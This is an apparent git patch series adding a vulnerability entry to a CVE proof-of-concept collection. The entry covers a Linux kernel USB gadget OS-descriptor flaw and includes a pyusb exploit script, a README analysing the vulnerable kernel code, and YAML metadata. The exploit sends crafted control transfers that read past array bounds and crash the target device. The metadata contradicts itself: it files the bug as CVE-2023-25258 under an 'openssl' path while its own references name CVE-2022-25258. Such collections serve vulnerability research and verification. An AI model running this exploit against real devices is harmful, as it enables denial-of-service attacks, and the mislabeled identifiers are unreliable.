From 7fcd242c24ab4293fce71d5f1d9a8a97b9ae7d27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Sun, 12 Mar 2023 09:09:48 +0000 Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE=5F2023=5F25258?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/openssl/2023/CVE_2023_25258/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/openssl/2023/CVE_2023_25258/.keep diff --git a/cve/openssl/2023/CVE_2023_25258/.keep b/cve/openssl/2023/CVE_2023_25258/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7d69bc97242a9ac776cb341e1aab19a18aaf23f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Sun, 12 Mar 2023 09:16:17 +0000 Subject: [PATCH 2/8] =?UTF-8?q?add=20cve/openssl/2023/CVE=5F2023=5F25258/C?= =?UTF-8?q?VE=5F2023=5F25258.py.=20=E5=9C=A8=205.16.10=20=E4=B9=8B?= =?UTF-8?q?=E5=89=8D=E7=9A=84=20Linux=20=E5=86=85=E6=A0=B8=E4=B8=AD?= =?UTF-8?q?=E7=9A=84=20drivers/usb/gadget/composite.c=20=E4=B8=AD=E5=8F=91?= =?UTF-8?q?=E7=8E=B0=E4=BA=86=E4=B8=80=E4=B8=AA=E9=97=AE=E9=A2=98=E3=80=82?= =?UTF-8?q?USB=20=E5=B0=8F=E5=B7=A5=E5=85=B7=E5=AD=90=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E7=BC=BA=E5=B0=91=E5=AF=B9=E6=8E=A5=E5=8F=A3=E6=93=8D=E4=BD=9C?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E6=8F=8F=E8=BF=B0=E7=AC=A6=E8=AF=B7=E6=B1=82?= =?UTF-8?q?=EF=BC=88=E5=85=B7=E6=9C=89=E5=A4=A7=E5=9E=8B=E6=95=B0=E7=BB=84?= =?UTF-8?q?=E7=B4=A2=E5=BC=95=E7=9A=84=E8=AF=B7=E6=B1=82=E5=92=8C=E4=B8=8E?= =?UTF-8?q?=20NULL=20=E5=87=BD=E6=95=B0=E6=8C=87=E9=92=88=E6=A3=80?= =?UTF-8?q?=E7=B4=A2=E5=85=B3=E8=81=94=E7=9A=84=E8=AF=B7=E6=B1=82=EF=BC=89?= =?UTF-8?q?=E7=9A=84=E6=9F=90=E4=BA=9B=E9=AA=8C=E8=AF=81=EF=BC=8C=E5=8F=AF?= =?UTF-8?q?=E8=83=BD=E4=BC=9A=E5=8F=91=E7=94=9F=E5=86=85=E5=AD=98=E6=8D=9F?= =?UTF-8?q?=E5=9D=8F=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- .../2023/CVE_2023_25258/CVE_2023_25258.py | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py new file mode 100644 index 00000000..475ebc94 --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py @@ -0,0 +1,94 @@ +#!/usr/bin/python3 + +# +# Sample exploit to demonstrate Linux USB gadget +# subsystem's os descriptor handling flaws. +# +# This script requires pyusb. +# +# https://github.com/szymonh +# + +import argparse + +import usb.core + + +REQ_GET_DESCRIPTOR = 0x06 + + +def auto_int(val: str) -> int: + '''Convert arbitrary string to integer + Used as argparse type to automatically handle input with + different base - decimal, octal, hex etc. + ''' + return int(val, 0) + + +def parse_args() -> argparse.Namespace: + '''Parse command line arguments + ''' + parser = argparse.ArgumentParser( + description='Sample exploit for interface OS descriptor vulnerability' + ) + + parser.add_argument('-v', '--vid', type=auto_int, required=True, + help='vendor id') + parser.add_argument('-p', '--pid', type=auto_int, required=True, + help='product id') + + return parser.parse_args() + + +def print_request(req_type, req, val, idx, length): + '''Write control transfer request to stdout + ''' + print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format( + req_type, req, val, idx, length), end=' ') + + +def exploit(args: argparse.Namespace) -> None: + '''Attempt exploit the interface OS descriptor + Kernel will crash due to null pointer dereference and access + beyond array boundaries. + ''' + usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid) + if usbdev is None: + print('Device not found, verify specified VID and PID') + return + + for cfg in usbdev: + for idx in range(cfg.bNumInterfaces): + if usbdev.is_kernel_driver_active(idx): + usbdev.detach_kernel_driver(idx) + usbdev.set_configuration() + + data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12) + if not data or len(data) != 0x12: + print('OS descriptors are not supported') + exit(1) + + vendor_code = data[16] + print('Vendor code: {0}'.format(vendor_code)) + + bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE + bRequest = vendor_code # set to vendor code + wValue = 0x00 # upper byte needs to be zero, lower is the interface index + wIndex = 0x05 # needs to be 0x5 + payload = 4096 # value larger than 0x0A + + # iterate throught the c->interface array and beyond + for val in range(0x00, 0xff): + wValue = val + try: + print_request(bmRequestType, bRequest, wValue, wIndex, payload) + data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload) + print('Read data: {0}'.format(data)) + except usb.core.USBError as e: + print(e) + + +if __name__ == '__main__': + '''Main script + ''' + exploit(parse_args()) \ No newline at end of file -- Gitee From 4accc831ad53635a11a57523e1a7265c4fb4eb03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Sun, 12 Mar 2023 09:26:48 +0000 Subject: [PATCH 3/8] add cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- .../2023/CVE_2023_25258/CVE_2023_25258.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml new file mode 100644 index 00000000..7fda0900 --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-25258 +source: +https://github.com/szymonh/d-os-descriptor +info: +name: An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. +severity: medium +description: | +An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. +scope-of-influence: +linux 5.16.10 +reference: +https://nvd.nist.gov/vuln/detail/CVE-2022-25258 +classification: +cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H +cvss-score: 4.6 +cve-id: CVE-2023-25258 +cwe-id: CWE-476 +cnvd-id: None +kve-id: None +tags: USB,validation \ No newline at end of file -- Gitee From c8e11edd64da363ee9f9b9cd3f176afd72b81e7b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Sun, 12 Mar 2023 09:30:11 +0000 Subject: [PATCH 4/8] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2..1731f599 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -56,6 +56,7 @@ cve: - CVE-2022-2274 - CVE-2022-3602 - CVE-2023-25136 + - CVE-2023-25258 libxml2: - CVE-2020-24977 - CVE-2021-3517 -- Gitee From 76f2cfc18c5c43bf1362912c3ee3c8b10ddcd1df Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Sun, 12 Mar 2023 09:38:25 +0000 Subject: [PATCH 5/8] add cve/openssl/2023/CVE_2023_25258/README. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/openssl/2023/CVE_2023_25258/README | 56 ++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 cve/openssl/2023/CVE_2023_25258/README diff --git a/cve/openssl/2023/CVE_2023_25258/README b/cve/openssl/2023/CVE_2023_25258/README new file mode 100644 index 00000000..bf3208bd --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/README @@ -0,0 +1,56 @@ +#d-os-descriptor +##Summary +The USB Gadget Subsystem includes security issues in the OS descriptor handling section of composite_setup function (composite.c). Processing of properly crafted control transfer request messages result in device crash due to null pointer dereference or memory corruption. +##Description +The OS descriptor handling section of composite_setup for interface recipient is implemented as follows. +case USB_RECIP_INTERFACE: + if (w_index != 0x5 || (w_value >> 8)) + break; + interface = w_value & 0xFF; + buf[6] = w_index; + count = count_ext_prop(os_desc_cfg, + interface); + put_unaligned_le16(count, buf + 8); + count = len_ext_prop(os_desc_cfg, + interface); + put_unaligned_le32(count, buf); + value = w_length; + if (w_length > 0x0A) { + value = fill_ext_prop(os_desc_cfg, + interface, buf); + if (value >= 0) + value = min_t(u16, w_length, value); +} +break; +The interface variable is derived from w_value and later utilized to index usb_configuration->interface array in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the endpoint should be stalled. + +In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len, 14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low. + +Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved usb_function pointer is null the endpoint should be stalled. +static int count_ext_prop(struct usb_configuration *c, int interface) +{ + struct usb_function *f; + int j; + + f = c->interface[interface]; + for (j = 0; j < f->os_desc_n; ++j) { + struct usb_os_desc *d; + + if (interface != f->os_desc_table[j].if_id) + continue; + d = f->os_desc_table[j].os_desc; + if (d && d->ext_compat_id) + return d->ext_prop_count; + } +return 0; +} +##Impact +Linux (and Android) devices exposing usb gadgets with OS descriptor support may be arbitrarily crashed by a malicious host by means of a single control transfer message. + +##CVE +CVE-2022-25258 + +##Patch +A patch addressing the described issue was accepted and is now available in supported kernel versions. For more information consult the below link. + +USB: gadget: validate interface OS descriptor requests \ No newline at end of file -- Gitee From 44e830557bd46bb395c3b3ec0b0705077b90a665 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Mon, 13 Mar 2023 08:44:13 +0000 Subject: [PATCH 6/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?openssl/2023/CVE=5F2023=5F25258/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/openssl/2023/CVE_2023_25258/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/openssl/2023/CVE_2023_25258/.keep diff --git a/cve/openssl/2023/CVE_2023_25258/.keep b/cve/openssl/2023/CVE_2023_25258/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2fb5d1efea2e0b67554a2d012712b47e1a628cbc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Mon, 13 Mar 2023 14:23:43 +0000 Subject: [PATCH 7/8] update cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- .../2023/CVE_2023_25258/CVE_2023_25258.yaml | 41 +++++++++++-------- 1 file changed, 23 insertions(+), 18 deletions(-) diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml index 7fda0900..3847b9ec 100644 --- a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml @@ -1,20 +1,25 @@ id: CVE-2023-25258 -source: -https://github.com/szymonh/d-os-descriptor +source: https://github.com/szymonh/d-os-descriptor info: -name: An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. -severity: medium -description: | -An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. -scope-of-influence: -linux 5.16.10 -reference: -https://nvd.nist.gov/vuln/detail/CVE-2022-25258 -classification: -cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H -cvss-score: 4.6 -cve-id: CVE-2023-25258 -cwe-id: CWE-476 -cnvd-id: None -kve-id: None -tags: USB,validation \ No newline at end of file + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: important + description: | + 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。 + scope-of-influence: + Red Hat Enterprise Linux 9 + reference: + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10 + - https://github.com/szymonh/d-os-descriptor + - https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c + - https://lists.debian.org/debian-lts-announce/2022/03/msg00011.html + - https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TCW2KZYJ2H6BKZE3CVLHRIXYDGNYYC5P/ + - https://security.netapp.com/advisory/ntap-20221028-0007/ + - https://www.debian.org/security/2022/dsa-5092 + - https://www.debian.org/security/2022/dsa-5096 + classification: + cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 4.6 + cve-id: CVE-2023-25258 + cwe-id: CWE-476 + tags: USB,Memory corruption \ No newline at end of file -- Gitee From 129a3757b4e211eac8e4c8e151bb1f6e804c0d9f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Tue, 14 Mar 2023 04:56:34 +0000 Subject: [PATCH 8/8] update cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml index 3847b9ec..077affc1 100644 --- a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml @@ -2,7 +2,7 @@ id: CVE-2023-25258 source: https://github.com/szymonh/d-os-descriptor info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: important + severity: MEDIUM description: | 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。 scope-of-influence: -- Gitee